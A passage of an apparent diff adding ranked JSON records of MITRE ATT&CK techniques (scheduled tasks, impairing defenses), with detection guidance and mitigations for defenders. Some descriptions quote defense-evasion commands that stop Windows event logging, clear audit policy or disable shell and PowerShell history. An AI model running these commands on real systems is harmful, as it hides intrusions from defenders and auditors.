of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).", + "url": "https://attack.mitre.org/techniques/T1053", + "detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "score": 2.8473428571428574, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [ + { + "tid": "T1053.001", + "name": "Scheduled Task/Job: At (Linux)", + "description": "Adversaries may abuse the at utility to perform task scheduling for initial, recurring, or future execution of malicious code. The at command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)\nAn adversary may use at in Linux environments to execute programs at system startup or on a scheduled basis for persistence. at can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.\nAdversaries may also abuse at to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, at may also be used for Privilege Escalation if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)", + "url": "https://attack.mitre.org/techniques/T1053/001", + "detection": "Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \nReview all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All at jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1053.002", + "name": "Scheduled Task/Job: At (Windows)", + "description": "Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of malicious code. The at utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using at requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. \nAn adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence. at can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).\nNote: The at.exe command line utility has been deprecated in current versions of Windows in favor of schtasks.", + "url": "https://attack.mitre.org/techniques/T1053/002", + "detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n

    \n
  • Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
    • \n
  • Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
    • \n
  • Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
    • \n
  • Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
    • \n
  • Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
    • \n
  • Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
    • \n
\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1053.003", + "name": "Scheduled Task/Job: Cron", + "description": "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\nAn adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. ", + "url": "https://attack.mitre.org/techniques/T1053/003", + "detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. ", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1053.005", + "name": "Scheduled Task/Job: Scheduled Task", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.\nThe deprecated at utility could also be abused by adversaries (ex: At (Windows)), though at.exe can not access tasks created with schtasks or the Control Panel.\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).", + "url": "https://attack.mitre.org/techniques/T1053/005", + "detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n
    \n
  • Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
    • \n
  • Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
    • \n
  • Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
    • \n
  • Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
    • \n
  • Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
    • \n
  • Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
    • \n
\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1053.006", + "name": "Scheduled Task/Job: Systemd Timers", + "description": "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to Cron in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over SSH.(Citation: Systemd Remote Control)\nEach .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are Systemd Service unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.", + "url": "https://attack.mitre.org/techniques/T1053/006", + "detection": "Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.\nSuspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.\nAudit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1053.007", + "name": "Scheduled Task/Job: Container Orchestration Job", + "description": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.\nIn Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)", + "url": "https://attack.mitre.org/techniques/T1053/007", + "detection": "Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. ", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ] + }, + { + "rank": 4, + "tid": "T1562", + "name": "Impair Defenses", + "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.", + "url": "https://attack.mitre.org/techniques/T1562", + "detection": "Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.\nMonitor environment variables and APIs that can be leveraged to disable security measures.", + "score": 2.499685714285715, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ], + "subtechniques": [ + { + "tid": "T1562.001", + "name": "Impair Defenses: Disable or Modify Tools", + "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information.\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to Indicator Blocking, adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)", + "url": "https://attack.mitre.org/techniques/T1562/001", + "detection": "Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity.\nLack of expected log events may be suspicious.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ] + }, + { + "tid": "T1562.002", + "name": "Impair Defenses: Disable Windows Event Logging", + "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\nAdversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.", + "url": "https://attack.mitre.org/techniques/T1562/002", + "detection": "Monitor processes and command-line arguments for commands that can be used to disable logging. For example, Wevtutil, auditpol, sc stop EventLog, and offensive tooling (such as Mimikatz and Invoke-Phant0m) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering) \nIn Event Viewer, Event ID 1102 under the “Security” Windows Log and Event ID 104 under the “System” Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) Service Control Manager Event ID 7035 in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.\nMonitor the addition of the MiniNT registry key in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control, which may disable Event Viewer.(Citation: def_ev_win_event_logging)", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1562.003", + "name": "Impair Defenses: Impair Command History Logging", + "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. \nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.\nAdversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.\nOn Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)", + "url": "https://attack.mitre.org/techniques/T1562/003", + "detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious.\nMonitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. ", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1039", + "name": "Environment Variable Permissions", + "description": "Prevent modification of environment variables by unauthorized users and groups.", + "url": "https://attack.mitre.org/mitigations/M1039" + } + ] + }, + { + "tid": "T1562.004", + "name": "Impair Defenses: Disable or Modify System Firewall", + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. ", + "url": "https://attack.mitre.org/techniques/T1562/004", + "detection": "Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ] + }, + { + "tid": "T1562.006", + "name": "Impair Defenses: Indicator Blocking", + "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as PowerShell or Windows Management Instrumentation.\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. ", + "url": "https://attack.mitre.org/techniques/T1562/006", + "detection": "Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.\nDepending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\AUTOLOGGER_NAME{PROVIDER_GUID}", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1562.007", + "name": "Impair Defenses: Disable or Modify Cloud Firewall", + "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in Disable or Modify System Firewall. \nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.", + "url": "https://attack.mitre.org/techniques/T1562/007", + "detection": "Monitor cloud logs for modification or creation of new security groups or firewall rules.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1562.008", + "name": "Impair Defenses: Disable Cloud Logs", + "description": "An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. \nCloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)", + "url": "https://attack.mitre.org/techniques/T1562/008", + "detection": "Monitor logs for API calls to disable logging. In AWS, monitor for: StopLogging and DeleteTrail.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: Configuring Data Access audit logs) In Azure, monitor for az monitor diagnostic-settings delete.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1562.009", + "name": "Impair Defenses: Safe Mode Boot", + "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. Modify Registry). Malicious Component Object Model (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)", + "url": "https://attack.mitre.org/techniques/T1562/009", + "detection": "Monitor Registry modification and additions for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a * in front of the \"Startup\" value name: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run[\"*Startup\"=\"{Path}\"] or by adding a key to HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)\nMonitor execution of processes and commands associated with making configuration changes to boot settings, such as bcdedit.exe and bootcfg.exe.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1562.010", + "name": "Impair 